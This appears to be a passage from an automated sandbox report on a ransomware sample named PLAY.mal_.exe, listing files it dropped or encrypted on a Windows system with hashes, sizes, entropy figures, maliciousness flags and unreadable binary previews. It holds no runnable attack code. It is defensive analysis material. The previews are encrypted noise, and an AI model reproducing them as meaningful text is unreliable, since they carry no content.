        SHA-512:FD7F1E9A7BD6622043F894C8BB9801705925447DD9DA847F66DC153B59920E37A3DEAD9C9EF589EA1B51B3EC9734AD82BAC40F4A6285A231AA18AED41C2D6CF1
        Malicious:true
        Preview:.kZ....0@......Sg.cl...4..r@.c]fQ.e......?4.o.E.,..!...lx...P.m.%KC..Z.^.2..".(w..p.l7#..M...,9.~a...Z..[..xi..w..*.....Uy....Ul...c.r5.%6GE......u.2..0...Za...d.@.@.....V....o>...:.T.|J..5..~...c..#b....%.gnl.Q.d...9't=g..o4..k$>A.U..F......N..N..9....,...$E.Z..i...-[..I;..B..}m...|.@..._...:+J....c'..M.X..$.\'.....^..`t..r*....{..}....v.\.gh..^.O..t.h+..6L....7...{...1.v..^..rSU.s.d&D../.J@K...:.:?.F..R..uS.M..Q..R'....*.|&..|.]E8.;..7=E.-.....^R.M.Q..R.y.".s...|.D..tl*....D..6^..;t%...G.'8...G.'............#X..?.]2..F....e...5.%...6fFL..4.].....C..&.?d.JS."?.].d.Bu...p.....U.Q..H(.Y.%).z........i..:P..J6.e....O.}...t.4.Fj.....%.8Pr..y_./c.N...-/.B\nP..@.h...$I.`7.m{..H....C.8 $..Z...cI.jy..\...^.u...N.f...C....+....G..s.>[R......5...,5"...6.Q.}. u...Z...Q..?...`s...?..+O....@....Z'.3~n.m...Y..El.^..N......f.Ttt.5=<F....ls.`.\`..+...Q+...G.........SF&i..8C...Q.<..j.R.Q[.G.....B...........s...2.(...\%....bZ.._=.....2..Mf.l.....7......m.*a

        C:\ProgramData\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\packages\vcRuntimeMinimum_amd64\cab1.cab

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1035576
        Entropy (8bit):7.999825934794254
        Encrypted:true
        SSDEEP:
        MD5:F04DF6CF62D556BD6794FAF39305A895
        SHA1:FE7984E43633B09E435BC90393D503213EE5DEA8
        SHA-256:6B020E5DA5E519C2ED10FD1DDD087857E457BB8AE69E53EFA8FC234D38D98D27
        SHA-512:35DFA9BA04B761CB2E23D3AEED4A815AB303B86D409D9B791547BC5BE9F0AA0D4246B356FE03370DFA7F8D87A9B52531F55090F7B56B254A840E1113DA4ECFF9
        Malicious:true
        Preview:m.t..F8.i?.p..)g2.....' .e.jj~.}.z...}..,.A.{..t*1...M.Y..=5^y}.".zt3...&.f.,g[..?Jx...$......[......9~....:JM....n..?-...]....<^..6..&rI9.$..83Oy...q.x'b.v.~,.:yL.$...ZO........0B[.....x...3u.r...D..p..$.P.....:.o..~.)..rc.L.7o..G..$....O....b...6B...J).:s.._b.....c8....`/.~y.OS...3|.4/..:.0.6......p$.r.9.Mx..`....T......<.....5..;87......I.a..#;.....R7......{..8..f..5..z....Ln=..:/..{M...Q.V...5=:P6+dA..<..E.....<.Q.-E.....R..)........t....J..u9q..:h.....#Zdk....Z.c.....G..g..X3aV..B.._M)......tEu.h....n"..a.F.......7H..X.i.o.:Yr.Vlw"jY"..5..H.:x..EE K..f]Acu.0'.......'.H.+..9..C..c5..Gs...z...hWM.b.`...5.'..._..B....d.>B..[|.+d...\..A...O.Y...^gC../..Y?.Q....]..5.d7..........Zs6.o?.H.hg................vDal.Z...^.v...m....=....-#=.Y.G.....,. ..aLq{p..t..7.z..Z..T.......MAvy./..D...7..:.....-.....N[~.b.<..B.r+/.fN%..Y...g..d..^_s..>FN....4.W...pG..1.o....sq.._v)C..h.e.M..>(.......y.2....o.<.^N...5:....[.6Yri.^.I..|

        C:\ProgramData\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\packages\vcRuntimeAdditional_x86\cab1.cab

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):5154888
        Entropy (8bit):7.999960263280578
        Encrypted:true
        SSDEEP:
        MD5:5DE9BB4B9A1842360A5967727E6EB056
        SHA1:CD913C346D384F9B42487DEFF28338616351AFA9
        SHA-256:ADC6BBE62F96AD18D2F06BC85E61D76DC9C81A955C77FC165E34C78688868D68
        SHA-512:45CC961C42BB06EF6AA7506A658C275AA346E4746DE3B0D5A27FD294D9AE758AE26C81AB6D544B07D85F5FF4BEA51094860562E79CEC941D205254EC3AABC18D
        Malicious:true
        Preview:..i.(..&..UK.....%.3.pf..k....bf.... .q(.3<'..-..Zt....|.?....k..6,~.....R.../S...e0Sy3;.e.....y..c.>..*....[..=q0Y....j.....[....=.....X..x..d....F..]...n+....T...........C.G.(..`..y.Cd<6..L..P..x.^.D.Y.&.B.>y=f....,.0..1.@.h.UU.n..y..... ........eAA..<.j.....h.(s..s=.........]......BLT.P.n.M......,.c.Q[O._...o....W..|s.t.^....=.(.=*Of......E..SK....DGb.a.G.......k..y.Fs...!....E...r..j3v....]..L....+a`]..i.2N..4w.......[........>.l...E.y.."..nR.J..K.o..'..y0J...B....r......]gI.7...V........[.........;..%..*<.*.yo...n1.u...fk.1........!...~fy...4.L...f..nV.c.. ..WO.f..I.....D.]z...]....B..c1......./t.f.+f.J..'.Y.5@....U.7v2S!..e.=....b]..o..SX..!gG......E...F.B.5..9 .+;W.eOO.......~.r4.....*W.5.....}..<LU...`....bS.........[.dI&Q.g.<.F.6...D$'...g..@.....^...wEM...G.C...q...$/.;..s....j..U..M.kQh..1....].0....1.....A@~..C.+....T....F..B.....Y...:.m.....P.'.W..zP9...E.. bY....I.I.mU.......V:e..!L.-w...!Y..}.c*#.J.]h.-.......vh0..J..

        C:\ProgramData\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\packages\vcRuntimeMinimum_x86\cab1.cab

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):822760
        Entropy (8bit):7.9998186605183745
        Encrypted:true
        SSDEEP:
        MD5:31079187545A7A3EEAFD0B0F4610F4FB
        SHA1:16F4EE2A5164FDE356F3B4981E3BB6BC4BA726D7
        SHA-256:D9E556A775D5777E938AAFEF9CDFC4C8E7AF22D19E75F45BBD71C89B3AA3C0E7
        SHA-512:86DD17BDB6B1D1A5759346A924DA2F7FF6BB8E033A89B93AD1381BAE57B3AA40DE9786B13757282D94FB6787BEA6A5E0BD6AB36D4BF6B80BBB11C3F954B05607
        Malicious:true
        Preview:...B..@..5.&...M...t..._.f...k../..PB......V..F...2.!eN1...X.<F.......cV...........[*.#-.Fx....p5....H.9..V..../..ru...BRx...g]o].*m..9.....].hST.E.'.:...EU.<...I....k...'.=mt.?..K_..)4{.~!..:.XW.......U....)4...<.T.l./...+../..R$.:'.>..}1n.......,.!..2~P ........Rc...6|........r.gp....=.>.]...=....lZbfy;..,......at...,.9........*c.....F...}O.#^-..~...^.X.R+.5....=.../.*..f.'I.....h........R.?>.g..(.x..>q....:..[M....f..rZ.]...#:..1w?.QJ^...[..4.~.=4..m..37f..FO2E.M.......D....i.6..C....|..S.m...SA..h?X..u."....{.a.)...N..^....M..F.U.6y.....n.t.p..G3...6.muJMT|..T..v.F....?.4..N.w...7.&~...G.Vpt.K.......2...>.J.%.%...:...b...Q...|U.y..\ .}L..tO68.]...+..Ytr..=...a..*B?.....=.*:..qx.$....c...{...W...,.}.|.k....<..Zh.vE3.:...`..%/..l..JK.a..4 ...X.fw...&k....P.TSJ..7..*....s..7..Jx7PM.y,..D..D.n.@.&f...a4a...eyO'R.Z.-t.......G....Zh..3M...T.NT..L.*.?`..G...........3....O-.............B1.?........v.3.>B<2.V....Ne..h.rX..

        C:\ProgramData\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\cab1.cab

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):810840
        Entropy (8bit):7.999783321611755
        Encrypted:true
        SSDEEP:
        MD5:59F3C81863BDA8700A10821895BD49C8
        SHA1:7CC6D8226B6A59FA97FE2C2994D0FF402311745C
        SHA-256:E6F1B56EEB4C3C3CDA0D6FB2F47C99BE707FEBA35479FD40F08ECA079CBB969E
        SHA-512:E26AF892CC5A7A996D25C59135F760C4A6D4351245E5413D104A806E73A3C3789FCDCC4DBECE3D8266029E1068CF2946ECF13780713A3EB92367CE90578E270C
        Malicious:true
        Preview:.............(.]..h...te.I.X..8..T3..Z.....<3..!.X...............Bn.......Y.......N....`.Y4N...F,....k..[.dj...7.O.q.D...)...&...a.U.v....)......5*.R.....Yg..:......kwy9."(.K.$F.N.n_.........;.m....Z.....W.QG.u..+7.J....l....Y...}ZjAm.|....$*..R9S.`..X....+`L...T...fn.8...'.&.@.h@.~)UV..A...k...[l0....k...._.../...q..K....=.`...b..j....l.l..O..^......2..%.)....u.C...........{..;A0).%...M....:........FD.e....p.....f@......"..Rx.b.6.g...).r.....M.>. Qy.....S.I..'O....W`.z>4.hB....G.......XU.56.$-.....(.X.M+bJ....=y\..L......ce2-.R3.......N`=..Ws.."7.+$'<.4:.Wk?.T.q......WWiy%.....4.n{...*...e]..ei].R}....;:X...2r.'~6....<9.oX../..=.M.jb..c6..._.G...76.C.-...(.[5xJ.'O\r.....6..$:......b..p-..7..-........e...29.3..S28.i.A0`g..v..{........1.r.a.......A....n.b........q..E....m.....<k'...Y..E...}.U..C..N.Kz.?...7...c.......c'...Sqs.+b..xx7..J.[|w$l..%...#.I.V92...Y.. y...j.Mx.m..\.S%zY.c..,..&#-.*..U.2.9>.2k.Jx>5.........j....N....._...,

        C:\ProgramData\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\vcRuntimeMinimum_amd64\cab1.cab

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1547736
        Entropy (8bit):7.999882127843735
        Encrypted:true
        SSDEEP:
        MD5:AC7BA4508E688E76B331547B98C385AF
        SHA1:B40CF4EBBBAD9D1E3FC950A387AEA612F666989A
        SHA-256:35983FBD0BC965E374D6BD1F147B5521DADD7B962E2A7FC16703EE871B5791F1
        SHA-512:235D6B1E0A7CAB5D7C34DE15952ABB285D592A1D3CA7910D81E7CD38DEED3B4524AAF89CBE357B61CFAE9BC69B7D7140D04E687B9BA37C460D90CBCA31433B29
        Malicious:true
        Preview:C..j.d.....j{.9...s.Z.:A...%._k....=.....(:3u.....R.^s..I-...gp...}y<x(..).....,q>.A. ....A..pju6....#.....].uG%.x.K7..my.B...qer..U............"...=U..H....S..H.;..J _-2^I.`....R.V#.f.s.R..K.......?..dZ.h..,.N...o....cV....M.T.2.".;....Lm...l<.V.N....Y...G.;....Lp..R...M.y.w..L..<v...`.#.........J...%...|..r....-...P..Q.$.hR..BY.\..)[.~..g`K.s...4 ....K<..c...H..<.,.....&M.PF..RW..?/...Q.}...WW..P.7..?.|2..y..I[...w....N..%....$..7..`m..Q.$|]......|g'E,6...U.....y..........y`.V.......^...V..l~Qe.2#a...)'.e(@..(r0.Idj:.lB(ZnB......VrC>....XI..8...n.pa8.O...lS.+......GNH'..X..thT..gsH..<......n...H...-5.... .s"._.....$....C.d..7..s.5.{J.....&P..M.z2.&%.)/+...M.3...c.6....Ds.k.mfF.a..[r.P..WEd\..x9.D5,..A.H.G...b......7R..U|.J}....3.;l.K9..0M../.E....<..d.@..I....TJ....Q.E..^!T.]....Ku.U.zc...7.|..c.NF?./.O..-....E..Ja.Ne..x..!..D....8...f:.....8g..cjm.wZ...f.u..vs...X..S..d.x.\.u...........o..E'f"..Ip...t..u..6".u.D.x5..%Q3..Y.l..WQB.O

        C:\ProgramData\Package Cache\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\packages\vcRuntimeAdditional_x86\cab1.cab

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):4933976
        Entropy (8bit):7.999965056944057
        Encrypted:true
        SSDEEP:
        MD5:4F349E86E466361963F7CEC319570262
        SHA1:EA5EE8C64DC7D35D6EA92E03C4C7A9E8CFD6C234
        SHA-256:9BDCECFCB0613BDB324093C70C4E6234AD02B7E5A4735C4B3332F44F332BE65F
        SHA-512:ECD7E66C9A15419F6B3B3F6B03EA0F5276EDE7B8C368216BD6F4303E20D8C621421C68A4DD2CB6EF1BB168934A0CAA7C41FAE0C970406A6A28335901CAEF1683
        Malicious:true
        Preview:...;.c.......[.8.z/.g....?...S.#..T.X..0/.Xt.L.Q....!..^...k.3.-...r..K(Ak..A..<'....L..!...#4.qs.C...`N.!R}....O$8..j.m..R>RO..w....).P........<.g.D.k)...\:..9\.........o~J....M..?(.#;.4T.u.yX^.....K...JA<../....]..L.[...!...9.F...R(.:...n....KY.........k..h...AG.`[..#).5.IH..Z.1.L^k.P......d...l.y.T.."G..4....l.....'.z.....*...-Lx.5.p;.w.......o.WS,.\XS.. ...."%z[g..p.7.u....J..._......'....0./....Jl...^....T..6d.l.*.c....3...x\.... ..L@)d........A. Nb..v.....x.q..$..=.....a ..@..K*.}(.p.#...>.........c.&.'..o..X...4..LPjp9F.7*\....?g/....).O.....^l...T...mZ.R...%[....-Y........N....uJ..1R.}o......\.$#....(. 7w.S.{T/dp..K.nrU.y[......a...%.Y.6ue.^...j..@._"x....4_...S...ca.yq...\y.L..t......-.o....S.G...2~.V%..Wm..4..[T...E*.;..3.C.df...;#..%.uN.i..P....?...&.....xE..73c.vT........-;7i..q..V.......QE_....H...&..#..<6...V...d2v.Jf...jK..gd.!~r...G....l....-...i._I......a..b:...hF.J8..09./..H.fa.dN@8...B8.6..$1.&.....wR<..../..v.Hqo..-=.U.Y..Q..d.

        C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\state.rsm

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1896
        Entropy (8bit):7.887847781943311
        Encrypted:false
        SSDEEP:
        MD5:146428A951777E2AD38D58B126B52129
        SHA1:04BF78E77E40CF4709F1B7B9AF7031B2406829B2
        SHA-256:CC42FB00680E70EF3A04F9EAF1071E512F165BC24B023C012CBC692DEF470857
        SHA-512:309646B8A8B251EFD2FD159C24D24CAA09715CA938D0E4DC29394592874FD89350FD6897B14393D3E424A61AC9DE0D19F24598CF6CE53F1644679D76C12775C7
        Malicious:false
        Preview:.k9#.v}...`.Y...dd?.X.Mmt.y^q._.4.T....@.&.<.=L+.!...l;....T..kA^,..!.UO..V.7..A..5Q..&Gc.J$>...#...Ua.0.IF..P.,..*..._|..6.Ao.ZJ.oWg...ZQ($sI...mcm........&c/S55.q...........<...n..l[IY.2.H.`s9.gb.#UUJ.!..o.ZM..g#)....g.....~~$$..D^.]-.W..7.7.w%....4.]K...l.M|J;.a/..f..@..8...5..4......e.C0.r..E.v.*.k...?....bL@.a..\.....;...^.6.....I.='>N<...G..r....Bc.)D.i9ZK9'*3.....g.H....^...no...y.nk7?....0>..Zr.z...;.......=.s.M@.De.k9..j...u.."...7....h.....e..T..S...P......IL.L.....s.*...~.@.D..L._..B......o..*....h....0:t.wK.i*.l.? ^Ckk.dT..wuR.....CC.@...q..../.....D..9.f.C...L.2....~.0h.....V...}[.f...m.........k_.q.8r..-.T....d._...?SU.....\j.?.B8_.....lQ.....5...r^2.....(tYf..q.}...a..fC.%o....cz6.3..%..d..Pz#h'.?.*.>!.r..0.5-...i...."k.|..1..5:..(...7..!1(.f.Q..5G.k.!'..G.........8e.........T..U.|.!.I>............................>..G..u.....7.Ak...8.........".Z.V~....I..d...c.....n7...F......NeN.u.Csr........UNw........)....n"E.$."t.p........L>..

        C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\state.rsm

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2248
        Entropy (8bit):7.900285384342696
        Encrypted:false
        SSDEEP:
        MD5:76B5B76651EB293CEFCC82B457D7EB46
        SHA1:DFC3EE286A4104F601DAFDD722F96445D649E5BF
        SHA-256:8E24B6FC4C0804B2FD300047C43E1BCFFE1008C8A045B1FE4536083B73C297CF
        SHA-512:90027E6BD35BD260D293E67242AF9756EEA6BA84209C2D91140CEA4053C45B03B3FB46289664EE3A433AD47821729459F342D2BCA921782EA89C1BCAC2E9418F
        Malicious:false
        Preview:..t.8.,=.+...kSC.2.l.<SMl..QP..f....../..?...b.....).#!O...Y...M..|.&...r.....0....+-..s..../.D.J..%&.`...c......f......W}&..:.A..V........(.UP.R...Z([w.Ne.,|^.#...@..J.Z..C!|!@7..T....;".eB.i..-ht.,0.M_6u._W..pBW.05....2.Y>..B..z..j.....8..K{.O.V ......E.U...7..$.'....$!ZU.......<9......Tq,L."{..qp.'.s..~.......d...S-....r..xt...4Z7w.....=...J....[..44..[....@r....W.I..N....`...`.O.d.D.o....tc*...P....%...m...gV..;..,y.3.."....WbC.......86..R......V...p\w...yI...fF..??/.....E..Q.........u..N.}r..It..H.H..R\.`.[.....x..`.YK...b..H.d..q..Do....W;t....T).3..B([...%......".*..%x.s.I..a...'.;@".....j..Iyx...........N.vr.....tiq.r..Hf......q;.+..C..E.I...\.Bn.6.vO5w..$.aB.....&.v.&.9a..iz.V....y.(v.{.|...Rn}..V......T.RP.].<...AH...c..|M&...M.....}...PI.f.J...=}U...=.*&X.r.#..t.)....[.8E.1.y.@.j..u"(.....*..l8~.JM...9....J...C~.HK..o-z.j~...6.;..q.@..].L......@..6..Y2J.^..@>.....B...z...,..iD_q.s......0...yv1..>}.7.....,..

        C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\state.rsm

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1912
        Entropy (8bit):7.900022421214923
        Encrypted:false
        SSDEEP:
        MD5:BB8A84CEA92AC2ED098874464BEFA2E1
        SHA1:0359F179708669E7012EC4E63197B829E72D87CB
        SHA-256:A226D5B7738FAD15758F267D6E5679660D67C81D4A5E75429B4AB39801CC87B3
        SHA-512:A76730D899D93F285A4174E5C03C8EE3775060FA0EEFB354DCF79F07B88E38B669AC1EA7BA837198C49A9D13A2B8694B4D6DD9158D2D4D160E1693B98DA57608
        Malicious:false
        Preview:1y.ts.!..;....;@..hP.$b..m...`.i.!1.@&...r9..r....~c...M..@..E2~$....nPI. .*.g6.P^k..a`4.SF...7...A...A.4C.9L......8`..g.W.......yl..H..FQ...A..5"-@.gx..[..\..<..U.V..t.o.n68b.J4........t..`s..6...oh....jB..6..5&b....'".....P.,..`.W...`......N......`jA.>......4aq,C......a\..=......O.y}E.HP.".\4.....o.R.....k_..x...z.W..M..........&..HQ)Sp1T...d.9...~g.%.f..a.........KX.w.*s..qZ..??T......\....k.Gy..C.L.q...._.a$..d.3.R.An..mr...J.+.!....4..i..;.>....B4.F...m.l9..I.N.HV6..L...Q.7..?#Br-...YT>...m..Uq2..bF...y....2....22ip..].2.}k.Z:...#........Y..c.+.;...4o.k.E.cGR..'.-;...9..G)c.X.......h.NW{...~..%Y...C..1.!Ev+.2.F.\...K.W.DO)}...sg4..H........*.Y.-..HM$.v.9......#......-..%......~u...5.qi.|4.\....[e..Jb3.....gD$jh.Dr.p..h...)\.=t..(........@.@G_.4(L.....e..,`....\...m......3.i..C..../DdQ.?Mn ...T..U.|.!.I>.........................._..Zq.L...Sz.d.zC.z..J=c.uH..%..R.z....g.Y. I.^...:U.-#..B;.8....1..-..5.."..r.. ..`I[.N.X..F..5>...b..

        C:\ProgramData\USOPrivate\UpdateStore\updatestore4df22196-a1f2-426c-aa27-062a9f86aba6.xml

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):3688
        Entropy (8bit):7.946328396412271
        Encrypted:false
        SSDEEP:
        MD5:A3053EA397B077DA899CBCA6879C7626
        SHA1:7E33884202BA04508A750C8CA86BD8469CA73481
        SHA-256:2971834C72792189441456CB7B658BBF0C62D938F27D16F112E8DDC2FDB716A5
        SHA-512:FAB91DA6183454058415044DE574A78F2095631F5BB414E2924DBD79031204AA49A30633D55257034B36D43E5A77CF30C9ED080D6C81468FE8115C30A821AF1E
        Malicious:false
        Preview:....6....z..T.].......S.G..)...e.s=n..^4..5u.l/.*.I$...A..y.w.Z.....V]U.......}.......G..u.E...9.*V...]..,..w.N..*xE@.=....g?.BX.M...I...U.I...5./Fy...y.=W.A.9.....KvL....u.......5..`U...[.8.6....U.wZ...\.H-..gV'...;P.s...%..O~T.m..3z.J..< ..Buq.9=.\.5.._S..b.N...0v[..b;.b....7.#]nF...Z.h...#..e.|G....w?..#M....V4it&L..s..Z.`..Xt."w._.ai.y\S..9\.F.v...._,.J0.....".a.@L.....ZD.Y..k.f...~.k.....a....._7..t.O...y.l..Y..F....q8.Xh......P........U..5.G.B..X..o4l.G..1.;..J..".....tkd..Z.....,..5.=.....t..6I[.2-.v.a.y..#<0...[..|......&.D..../.Qs.h....4..d...H...t.p.7..oY..r.o......2.."DS=;6N'..m........E......3.0I..aW.2..l...W...0....%v.<D.../,....!....T..0..q.........k.F@.....G..N..0.T.._"..\!0.{.....G.@pJ&..v....O..b.q.H.R..G...p.S..`...... .A.mF.j.mT....'(.[.6..[.n5.!76S..^"......e...M.O..2..b...c.d."^.....0s|...d......%..Q...AX.i.....0..../;0..M+...]....j. .i..~4j. `.u#.J#.Nw..).{u C@...I.T./Q.}./....g.2.Y..<d...._......*....f.]....

        C:\ProgramData\USOPrivate\UpdateStore\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):3624
        Entropy (8bit):7.938624242181407
        Encrypted:false
        SSDEEP:
        MD5:ED046267EC06A42F90C9DAABFF33FB1D
        SHA1:53674604C880E6F1255C2E7440506B0104E839BF
        SHA-256:1ADC353C944AAFC4ABF79A7849D5C39E48E62C63B7B516DFC36692E788093829
        SHA-512:E9833876ACFF92EC1A3296641832BA1E292413C5C21C4A1ABD1B7939C217E323C0D4A941169431D19007E2D5B71A668BA15CF7CAD3D0CAA3B81D9AF0429D006F
        Malicious:false
        Preview:.....8....1..k3..qsk..v.4.9.9w....z2%q..A<n.!B.l.RwTw....VV..-.7.%g..%J\....i..p.>6lSL...P'V31._.....A....3S.......s.fE..,-...A..9?...N"kq.aW....z.?...U.u{..rJo.;..$.e.V.P...5q.....B...K.........b).....-F.4."8........N..w.:?*....L.O....v.9....VW..f....@.Bu..|..}A!.&...Q-n..3f...h.Y...Ez...Q...'.........(.*...8aPr.wFf...4........}....Y.!..l7@...*.D..uz.~@.j5..P.B..........tb=.R..L....04.u...|.!N.`b.....j.0....l.1.j...D..l".n.....tlO..`.m...9@h.3(..%.vj,+f...0N../...[n....Mx.H.......:..... #!../...C..dF`.X(.f.%.+..?......r8V......e..?.\..lRQ.q.jVD...{x..m.2......%Q.....jL..^....U.w...r.&..+...p..@..2..V.x...>..&..R..g.7.8..?.......`.....x....|.q)3...Y ....SXb8..H~......9.9.;!.>..U.I^..?.Y.\..U}..w.<. Z...B.P_.7Ew)..Vyw....Fs...k...c....t.7.....3p.D.OYs-...{.'.NO...U.Z..{..%.'.a..Y.%-.>.pVw.Z....!..!.S....&.\....M.{....=...%.v...nZc...v....3\...y'..(.L.J..?...|.$H...u;M.U.dj.ec.'...4z.....~..O....z......Ss8..p.........#.)+.}....p.X

        C:\ProgramData\USOShared\Logs\NotifyIcon.001.etl

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):9272
        Entropy (8bit):7.980725541493399
        Encrypted:false
        SSDEEP:
        MD5:AA328C45E04A9F0B811AEDA4AB334E5C
        SHA1:E57651BF461870FA2239935A7458D6A5AED30D14
        SHA-256:8FF61DED44B07C0D3020A3D33AF6BA627E37851FD5B83685E37F8F7C985B2BB7
        SHA-512:902B119FC47333C9E827E71C8FAADBCB6E8EEAD7B8057CB9D1C75A9DC9BBD46B5B8716ABFD5B7F3B4B18558203DF5C3EDBAE86843AE18849FF2355970A658DCC
        Malicious:false
        Preview:.\..!.!.d.J./.a..'.A8'..Ujz.F....n.....>..#...V)....~...[R......\^...B..F.Y...9...!..ev.........A..].....$.Q.u........Ba.pL.h..K.h.....6.{R..#x.%txps...<....C.'4...........\..4..<C.!...p..c|.a...^s-.V..... ...h..S..F..]_.a.(.3......^`FUdm$.U0z...d.0,:.X.5.H..P...z..l...+.......`....cs......@3..q....g....1..{......S^...;..LiR[...sfG.MT|......S...J...<.(.R]&.....s.r8...`.Ew.<N.C....0.3+.3..ia....w.......I.0.i%....F..,o..<...C.3.8........X..}...TI.lW...9..2.Z...(Vg.....0.h...`.T.We.....f... ....`.....Kr..Z~h.N.../`....QUzX......0tgDo_...N..O.V/.?*._T......6..( T...h.k....;w......A#v.|......P..#Q..'PVh..\z..t...Fv...#.. -.....V....g..Ot..u......e......M.z.!..s..B....`..G..-.zz...E.)....#u......y@.ctQ.....a.......J...........U*...Igy.m..t....f..).a..s?.d..M%..>\.aX...{#&.....U.IM..9"&11m3..Pk..BrXH0...t.=W...Q....Te.WtZn....I..C...d$...<..)..;.2c.t..t.|....^.X..b.e8.e....H..nDk..k.-M.c6....=.nPb.M..6...od..udG....>A1|9Rz......N..7.6.K

        C:\ProgramData\USOShared\Logs\NotifyIcon.002.etl

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):9272
        Entropy (8bit):7.9816423468474635
        Encrypted:false
        SSDEEP:
        MD5:539C9EC8D82572D767DBBA37DDFA8059
        SHA1:A93C565C9C5BD0796E1538295825A2D62CA43BE1
        SHA-256:674E33381D0E0CCBD947A7BF4160BAC0A541737786AB4E6DB565FF609B26BD55
        SHA-512:4A8F678C372BEDB751A586D414FA069EC5CB5A73713FCD8B8F38FE23FB84CB3C867B01150FA05EDA88E654A87A79F803D3B212965EA80EE560F1F12923354E83
        Malicious:false
        Preview:..T.....)S(V...lEw.)/;......1..p.....p...8L.k3[J.BA..0WM....l...tl.m..?].B...MG..b+6.y<..'.Wd+..7qt.q.(.U....1.s...v..3..;...?.dE..&~@...8e..Ao`.5_.G.e....3.`.m....=.5..9.........>.*......1(........1f.6}ux..PBUJc....sM..O2..'/.....Z./+$....vG.'......-....G.j...F|..I......Vl.6....Zr....j)x.!.~....4..].c.=j.H.-=\.8..+..."F.q.=.\..2.&...6.-s..^-.S........"-.E.c.TR...P.T.-...=n.....r.Y...<..j.eCyg.*9.W.8.I.<.Oj.D!.t..+}...e.h...........U...r<.4N...o$..M.(+.-7.9..oW.E..!>........... .(.G{...4&...}7r....x.ie.......:..c...c.!...:....<.,..7(dWd.t..I.tiOC.7.3X....{@$..n......&9..`.y.e..0....i..E}=O...G.d.^.Tr.#..P.....P..[^=.t..v......|a..}M..'....Z.....=......(y.0i...\W..M..@>..G.HNi..'K.V..?.cYUO.V......\./.~u.&*!..8-@{*.'d.o.}.....u7!.V.&....4....:AS.|..V.. ...h....?.....tV...f..h.:<...$\^.....J.P.jD...e..........o..-.A......x.=....g....../Gr.6., ...*$.9.<.g...'..I.C.s..YV ........fo....Z.*.F.U...Ox...mU....W)q....U. ......'....*<.....g..

        C:\ProgramData\USOShared\Logs\NotifyIcon_Temp.1.etl

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):9272
        Entropy (8bit):7.9809322588283385
        Encrypted:false
        SSDEEP:
        MD5:874C20768D07C1259FFCF88ACAD00185
        SHA1:7EF2C0C5D60408E1E86634804363EC9A2F7EB3E2
        SHA-256:7D297C088FDB48CB6F43335FD991A9F4E4D89D2DD97146411E605CFD6F091C37
        SHA-512:0F1A6125045521FC7C148E42C149F7A785B6ABE3FCC5DD81CF7AE0717CB743EBED0548A37EA0EF60EF63099E2689BBEB7E2DB4A1561983CBDCE424E644C5B0D1
        Malicious:false
        Preview:J.^Q.3O<.*T.A.?.Zaz.n.eO[.G#.}....Q....M..f...F.sq..!h....W.....|.u.0.&.[c....wp.....3.^-J.....h...*.;kY5):.[..o...s..?...[...l..`..)H)...g......&6..o.|(o....Y....ff..W|......\...G6P..HEMj<..........%F.(.9.Y..).7.....q.......p.X.M9y.=9[.{......*n+b....[N9).~.4[.........Ib..J.=`p..e.A.<.aJ{e.z...u..s..lCx.ke9S..2Mc4Vy$..Ug...)....tK-..".. .~.f..142...[6.....yD.]..6..F:..........;W.[>..~E....4NW...+.9-..T$.L.&.........lmWN....Y./....cw0*.._..t.....Z....?Q.../..#..Q.<..k...L..J.....s\g<xyS...........!.0.9......%4.J..W......f..$.^t.1,)q^..;5..G........G......x.....f..5.=....x...~Nv0.6...s.......g...a'z...q...4i.A.0R;.(.+./.8.#.T....Tp....D.)...J...5..._...{...Jc..H.+.<v.4..c$.O..).i..U..O..x..g....Q...C...g... ...ni..P..../..X........V~.C..h..O3..~....a...vw..~.8...o....F...........9.......cy.wz.u..yHS......1..c...T..].^........l.....;..<.m.F.3.a(..S.$.y}.&...[L.rXW....'.<;`.O.....u....YFY.&....^..M.4.j.].m]%d._.....!.;K{.`.Gu}~...'s.6w]OL

        C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.001.etl

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):29752
        Entropy (8bit):7.993326689991698
        Encrypted:true
        SSDEEP:
        MD5:4C0EAF881DF7DC6FBAECA2847ECC70C6
        SHA1:67A4618C96EE61FB3B781B4E6E0CB03F222B2F3B
